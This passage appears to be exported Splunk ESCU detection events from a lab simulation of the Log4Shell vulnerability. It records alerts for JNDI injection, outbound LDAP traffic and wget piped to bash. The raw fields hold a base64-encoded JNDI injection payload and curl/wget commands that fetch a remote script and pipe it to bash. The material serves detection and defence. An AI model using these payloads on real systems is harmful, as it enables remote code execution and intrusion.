on Objectives", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-20T00:21:41", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:110", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. 
This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642642751, search_name="ESCU - Log4Shell JNDI Payload Injection Attempt - Rule", action="Bad Request", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 3\",\"CIS 5\",\"CIS 16\"],\"context\":[\"Source:Application Log\",\"Stage:Execution\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Reconnaissance\",\"Exploitation\"],\"mitre_attack\":[\"T1190\"],\"nist\":[\"DE.CM\"],\"observable\":[]}", annotations._all="T1190", annotations._all="Stage:Execution", annotations._all="CIS 3", annotations._all="CIS 5", annotations._all="Source:Application Log", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="DE.CM", annotations._all="Reconnaissance", annotations._all="CIS 16", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 3", annotations.cis20="CIS 5", annotations.cis20="CIS 16", annotations.context="Source:Application Log", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Reconnaissance", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1190", annotations.nist="DE.CM", category="application/json", count="2", dest="10.0.1.21", dest_port="80", http_content_type="application/json", http_method="GET", http_referrer="unknown", http_user_agent="curl/7.79.1", info_max_time="+Infinity", info_min_time="0.000", risk_message="CVE-2021-44228 Log4Shell triggered for host 10.0.1.21", risk_object="10.0.1.21", 
risk_object_type="system", risk_score="15.0", savedsearch_description="CVE-2021-44228 Log4Shell payloads can be injected via various methods, but one of the most common injection vectors is via Web calls. Many of the vulnerable Java web applications that use log4j have a web component and are especially targets of this injection, specifically projects like Apache Struts, Flink, Druid, and Solr. The exploit is triggered by an LDAP lookup function in the log4j package; its invocation is similar to `${jndi:ldap://PAYLOAD_INJECTED}`, and when executed against vulnerable web applications the invocation can be seen in various parts of web logs. Specifically, it has been successfully exploited via headers like X-Forwarded-For, User-Agent, Referer, and X-Api-Version. In this detection we first limit the scope of our search to the Web Datamodel and use the `| from datamodel` function to benefit from schema-accelerated searching capabilities, mainly because the second part of the detection is pretty heavy: it runs a regex across all _raw events that looks for the `${jndi:ldap://` pattern across all potential web fields available in the raw data, like HTTP headers for example. 
If you see results for this detection, it means that there was an attempt at injection, which could be reconnaissance activity or a valid exploitation attempt, but this does not necessarily mean that the host was successfully exploited.", site="localhost", src="${jndi:ldap://10.0.1.16:1389/Basic/Command/Base64/KGN1cmwgaHR0cDovLzguOC44Ljg6ODAvd3AtY29udGVudC90aGVtZXMvdHdlbnR5dGhpcnRlZW4vbTggfHwgd2dldCAtcU8gLSBodHRwOi8vOC44LjguODo4MC93cC1jb250ZW50L3RoZW1lcy90d2VudHl0aGlydGVlbi9tOCl8YmFzaA==}", url="http://10.0.1.21:80/", url_domain="10.0.1.21", user="unknown" 1642642753, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="Command and Control", annotations._all="PR.DS", annotations._all="CVE-2021-44228", annotations._all="CIS 12", annotations._all="PR.PT", annotations._all="DE.AE", annotations._all="T1059", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1190", annotations._all="CIS 13", annotations._all="Stage:Initial Access", annotations._all="Source:Endpoint", annotations._all="DE.CM", annotations._all="Actions on Objectives", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", 
annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-20T00:21:41", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:114", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642642751, search_name="ESCU - Log4Shell JNDI Payload Injection Attempt - Rule", action="Bad Request", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 3\",\"CIS 5\",\"CIS 16\"],\"context\":[\"Source:Application Log\",\"Stage:Execution\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Reconnaissance\",\"Exploitation\"],\"mitre_attack\":[\"T1190\"],\"nist\":[\"DE.CM\"],\"observable\":[]}", annotations._all="T1190", annotations._all="Stage:Execution", annotations._all="CIS 3", annotations._all="CIS 5", annotations._all="Source:Application Log", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="DE.CM", annotations._all="Reconnaissance", annotations._all="CIS 16", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", 
annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 3", annotations.cis20="CIS 5", annotations.cis20="CIS 16", annotations.context="Source:Application Log", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Reconnaissance", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1190", annotations.nist="DE.CM", category="application/json", count="2", dest="10.0.1.21", dest_port="80", http_content_type="application/json", http_method="GET", http_referrer="unknown", http_user_agent="curl/7.79.1", info_max_time="+Infinity", info_min_time="0.000", risk_message="CVE-2021-44228 Log4Shell triggered for host 10.0.1.21", risk_object="unknown", risk_object_type="user", risk_score="15.0", savedsearch_description="CVE-2021-44228 Log4Shell payloads can be injected via various methods, but one of the most common injection vectors is via Web calls. Many of the vulnerable Java web applications that use log4j have a web component and are especially targets of this injection, specifically projects like Apache Struts, Flink, Druid, and Solr. The exploit is triggered by an LDAP lookup function in the log4j package; its invocation is similar to `${jndi:ldap://PAYLOAD_INJECTED}`, and when executed against vulnerable web applications the invocation can be seen in various parts of web logs. Specifically, it has been successfully exploited via headers like X-Forwarded-For, User-Agent, Referer, and X-Api-Version. 
In this detection we first limit the scope of our search to the Web Datamodel and use the `| from datamodel` function to benefit from schema-accelerated searching capabilities, mainly because the second part of the detection is pretty heavy: it runs a regex across all _raw events that looks for the `${jndi:ldap://` pattern across all potential web fields available in the raw data, like HTTP headers for example. If you see results for this detection, it means that there was an attempt at injection, which could be reconnaissance activity or a valid exploitation attempt, but this does not necessarily mean that the host was successfully exploited.", site="localhost", src="${jndi:ldap://10.0.1.16:1389/Basic/Command/Base64/KGN1cmwgaHR0cDovLzguOC44Ljg6ODAvd3AtY29udGVudC90aGVtZXMvdHdlbnR5dGhpcnRlZW4vbTggfHwgd2dldCAtcU8gLSBodHRwOi8vOC44LjguODo4MC93cC1jb250ZW50L3RoZW1lcy90d2VudHl0aGlydGVlbi9tOCl8YmFzaA==}", url="http://10.0.1.21:80/", url_domain="10.0.1.21", user="unknown" 1642642716, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", 
annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642642716, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", 
annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. 
This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642642716, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies 
the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642642716, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", 
risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642642716, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote 
file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642642716, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An 
instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642642716, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - 
http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642642716, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", 
lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642642716, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", 
dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642642716, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", 
annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642642716, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress 
Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. 
